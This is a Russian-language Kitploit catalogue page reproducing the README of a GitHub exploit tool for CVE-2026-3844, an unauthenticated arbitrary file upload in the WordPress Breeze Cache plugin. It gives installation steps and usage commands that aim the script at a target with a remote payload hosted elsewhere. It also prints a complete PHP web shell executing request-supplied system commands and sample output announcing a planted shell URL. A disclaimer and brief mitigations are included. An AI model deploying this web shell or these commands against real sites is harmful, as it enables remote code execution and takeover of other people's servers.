Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-3844 — WordPress - Breeze Cache <= 2.4.4 - Неаутентифицированная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

WordPress - Breeze Cache <= 2.4.4 - Неаутентифицированная произвольная загрузка файлов

Репозиторий
1124 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 — Неавторизованная произвольная загрузка файлов

MIT License Python 3.6+ WordPress


⚠️ Отказ от ответственности

root@kitploit:~
ДАННЫЙ ИНСТРУМЕНТ ПРЕДОСТАВЛЕН ИСКЛЮЧИТЕЛЬНО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И ИССЛЕДОВАНИЙ В ОБЛАСТИ БЕЗОПАСНОСТИ.
Несанкционированный доступ к компьютерным системам является незаконным. Используйте этот инструмент только на
системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Автор не несёт
ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением.

📋 Описание

CVE-2026-3844 — это критическая уязвимость неавторизованной произвольной загрузки файлов в плагине Breeze Cache для WordPress (версии ≤ 2.4.4). Плагин не выполняет надлежащую проверку параметра srcset в комментариях, что позволяет удалённым злоумышленникам загружать вредоносные файлы (включая веб-шеллы) на сервер.

🔴 Серьёзность

  • Оценка CVSS: 9.8 (критическая)
  • Вектор атаки: сеть
  • Требуется аутентификация: нет
  • Воздействие: удалённое выполнение кода (RCE)

🎯 Затронутые версии

  • Breeze Cache ≤ 2.4.4
  • WordPress все версии (зависит от плагина)

🔧 Технические детали

Уязвимость использует функциональность кэширования Gravatar в Breeze. Когда публикуется комментарий с особым образом сформированным параметром srcset, содержащим URL удалённого файла, Breeze загружает и сохраняет файл локально по пути:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]

Предварительное условие: в настройках Breeze должна быть включена опция «Host Files Locally - Gravatars».

🚀 Установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# Установка зависимостей
pip install pycurl termcolor

💻 Использование

Базовое использование

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

Расширенные опции

root@kitploit:~
# Проверка уязвимости цели без эксплуатации
python3 CVE-2026-3844.py -u http://target.com --check-only

# Использование собственного URL полезной нагрузки
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php

# Сохранение вывода в файл
python3 CVE-2026-3844.py -u http://target.com -o shells.txt

# Увеличение тайм-аута для медленных целей
python3 CVE-2026-3844.py -u http://target.com --timeout 30

Аргументы командной строки

АргументОписание
-u, --urlURL цели (обязательный)
-p, --payloadURL удалённой полезной нагрузки
--timeoutТайм-аут запроса в секундах (по умолчанию: 15)
--check-onlyТолько проверить, уязвима ли цель
-o, --outputСохранить URL шелла в файл

📝 Пример собственной полезной нагрузки

Создайте собственный веб-шелл (shell.php):

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

Разместите его в доступном месте, затем используйте:

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php

🔍 Строка проверки

Эксплойт автоматически проверяет наличие строки проверки 4356452d323032362d33383434 (hex-кодированная строка «CVE-2026-3844») в загруженном файле для подтверждения успешной эксплуатации.

🛡️ Меры по смягчению

  1. Обновите Breeze Cache до версии 2.4.5 или выше
  2. Отключите «Host Files Locally - Gravatars», если она не нужна
  3. Внедрите правила межсетевого экрана веб-приложений (WAF)
  4. Регулярно проверяйте функциональность комментариев

📸 Скриншот

root@kitploit:~
[*] ФАЗА 1: ОЦЕНКА УЯЗВИМОСТИ
[*] Проверка версии плагина Breeze...
[+] Цель УЯЗВИМА (Breeze v2.4.4)

[*] ФАЗА 2: ЭКСПЛУАТАЦИЯ
[!] ТРЕБОВАНИЕ: опция 'Host Files Locally - Gravatars' ДОЛЖНА БЫТЬ ВКЛЮЧЕНА
[*] Шаг 1: Отправка вредоносного комментария...
[+] Комментарий успешно опубликован
[*] Шаг 2: Ожидание кэширования файла Breeze...
[*] Шаг 3: Проверка загруженного файла...
[+] Файл найден по адресу: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] СТРОКА ПРОВЕРКИ НАЙДЕНА — ЭКСПЛУАТАЦИЯ УСПЕШНА!

[✓] СТАТУС: УСПЕХ
[✓] URL ВЕБ-ШЕЛЛА: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 Структура каталога

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # Основной скрипт эксплойта
├── README.md            # Этот файл
└── LICENSE              # Лицензия MIT

📄 Лицензия

Этот проект распространяется под лицензией MIT — подробности см. в файле LICENSE.

🙏 Благодарности

  • Автор: 0xgh057r3c0n
  • Обнаружение: команда исследователей безопасности
  • Идентификатор CVE: CVE-2026-3844

📞 Контакты

  • GitHub: @0xgh057r3c0n
  • Сообщить о проблемах: GitHub Issues

⭐ Поддержка

Если вы считаете этот инструмент полезным, пожалуйста, поставьте ему звезду ⭐ на GitHub!


Создано с 🐍 Python | Только для образовательных целей
Скачать инструмент